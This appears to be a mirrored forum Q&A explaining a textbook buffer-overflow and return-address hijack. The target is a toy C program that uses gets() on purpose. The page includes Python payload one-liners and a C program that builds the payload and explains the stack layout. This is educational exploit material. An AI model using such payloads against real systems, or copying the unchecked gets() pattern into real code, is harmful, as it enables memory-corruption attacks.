how to build up a buffer overflow payload

Time:10-26

I'm following this writeup on a buffer overflow of an array on the stack, doing a ROP attack to call a function that wouldn't normally be called.

There are three functions. vuln,flag and main.

main just calls vuln, and vuln has a stack overflow of a 180-byte buffer.

#include <stdio.h>

void vuln(void);   /* prototype so main can call vuln before its definition */

int main()
{
  vuln();
}

void vuln()
{
  char buf[180];
  gets(buf);   /* no length check: input longer than 180 bytes overflows the frame */
}

flag is not called and has two parameters:

void flag(int param1, int param2) { }

It exists on address 0x080491e2.

flag can be called by overflowing the buffer of 180 with 8 extra bytes and then adding the address that EIP gets.

python -c "print('A'*188 + '\xe2\x91\x04\x08')"

So far so good, flag is called but without parameters. To call flag with parameters we have to add 'A'*4 after flag's address and the two values of the integers with a '\r' between them.

python -c "print('A'*188 + '\xe2\x91\x04\x08' + 'A'*4 + '\xef\xbe\xad\xde\r\xd0\xde\xc0')"

I don't understand why the 'A'*4 is needed; what part of the stack is overwritten here? And also the '\r' between the arguments: if it's not there, it doesn't work. What function does the '\r' have?

CodePudding user response:

The AAAA are because on entry to flag, it expects the top of the stack to contain its return address, with arguments starting 4 bytes past that. You don't care about flag being able to return, so you just need 4 bytes of garbage in place of the return address.

As for the \r, it isn't between the arguments (they should be adjacent in memory and there can't be any bytes between them); rather it is actually the first (least-significant) byte of the second argument. The ASCII carriage return \r has numerical value 0x0d, so your arguments are 0xdeadbeef, 0xc0ded00d. I don't know why they wrote the low byte as \r instead of \x0d which would have been more consistent. Maybe it was automatically translated from binary to hex escapes by some program.
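The layout the answer describes, as an added example that is not part of the original question or answer: a small C program that builds the same 204-byte payload and then decodes it the way flag() sees its frame on entry. The 188-byte distance from buf to the saved EIP, the address 0x080491e2 and the two argument values are taken from the post; the 'A'*4 fake return address (0x41414141) is what the post's payload actually contains. The offsets assume a 32-bit x86 cdecl build like the writeup's (arguments at [esp+4] and [esp+8] on entry), which is an assumption about the binary, not something this page states. The newline check at the end is a caveat of my own: gets() stops reading at '\n' (0x0a), so any address or argument containing that byte would truncate the payload; the '\r' (0x0d) is harmless. Note also that the post's python one-liner is Python 2 syntax; under Python 3, print() would emit '\xe2' as two UTF-8 bytes.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Values from the post. PAD_LEN is the writeup's 188 bytes from buf to the
 * saved EIP (180-byte buffer plus 8 bytes of whatever sits between it and
 * the return address in this particular build). */
#define PAD_LEN      188
#define FLAG_ADDR    0x080491e2u   /* address of flag() */
#define FAKE_RET     0x41414141u   /* the 'A'*4: flag's never-used return address */
#define PARAM1       0xdeadbeefu   /* '\xef\xbe\xad\xde' little-endian */
#define PARAM2       0xc0ded00du   /* '\r\xd0\xde\xc0'; low byte 0x0d is the '\r' */
#define PAYLOAD_LEN  (PAD_LEN + 4 * 4)

/* x86 is little-endian, so the least-significant byte is written first. */
static void put_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)(v);        p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16);  p[3] = (uint8_t)(v >> 24);
}

static uint32_t get_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Build the payload from the post into out (PAYLOAD_LEN bytes); returns its length. */
size_t build_payload(uint8_t *out) {
    memset(out, 'A', PAD_LEN);                 /* fill buf and the 8-byte gap */
    put_le32(out + PAD_LEN,      FLAG_ADDR);   /* overwrites vuln's saved EIP */
    put_le32(out + PAD_LEN + 4,  FAKE_RET);    /* what flag sees as its return address */
    put_le32(out + PAD_LEN + 8,  PARAM1);      /* flag's first argument, [esp+4] on entry */
    put_le32(out + PAD_LEN + 12, PARAM2);      /* flag's second argument, [esp+8] on entry */
    return PAYLOAD_LEN;
}

/* The value vuln()'s 'ret' will pop into EIP. */
uint32_t saved_eip(const uint8_t *payload) {
    return get_le32(payload + PAD_LEN);
}

/* What flag() finds on the stack on entry: after vuln's 'ret' pops the saved
 * EIP, esp points at the next dword, which flag treats as its return address;
 * the two cdecl arguments follow it (assumed 32-bit x86 calling convention). */
struct flag_frame { uint32_t ret_addr, param1, param2; };

struct flag_frame frame_on_entry(const uint8_t *payload) {
    const uint8_t *esp = payload + PAD_LEN + 4;   /* just past the popped saved EIP */
    struct flag_frame f;
    f.ret_addr = get_le32(esp);
    f.param1   = get_le32(esp + 4);
    f.param2   = get_le32(esp + 8);
    return f;
}

/* gets() stops at '\n' (0x0a); a payload containing that byte is silently cut short. */
int contains_newline(const uint8_t *payload, size_t len) {
    return memchr(payload, '\n', len) != NULL;
}

int main(void) {
    uint8_t buf[PAYLOAD_LEN];
    size_t n = build_payload(buf);
    struct flag_frame f = frame_on_entry(buf);

    /* Human-readable summary on stderr, raw payload on stdout:
     *   ./gen > payload.txt && ./vuln < payload.txt */
    fprintf(stderr, "payload length: %zu bytes\n", n);
    fprintf(stderr, "saved EIP -> 0x%08x (flag)\n", saved_eip(buf));
    fprintf(stderr, "on entry to flag: ret=0x%08x param1=0x%08x param2=0x%08x\n",
            f.ret_addr, f.param1, f.param2);
    fprintf(stderr, "byte at offset %d is 0x%02x, i.e. '\\r'\n", PAD_LEN + 12, buf[PAD_LEN + 12]);
    if (contains_newline(buf, n))
        fprintf(stderr, "warning: payload contains 0x0a, gets() will truncate it\n");
    fwrite(buf, 1, n, stdout);
    return 0;
}
```

Running it shows the point of the answer directly: the dword at offset 188 is the only one vuln() ever uses (it is popped by ret), the 'A'*4 at offset 192 is what flag() would return to, and the '\r' at offset 200 is simply the low byte of 0xc0ded00d, not a separator.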
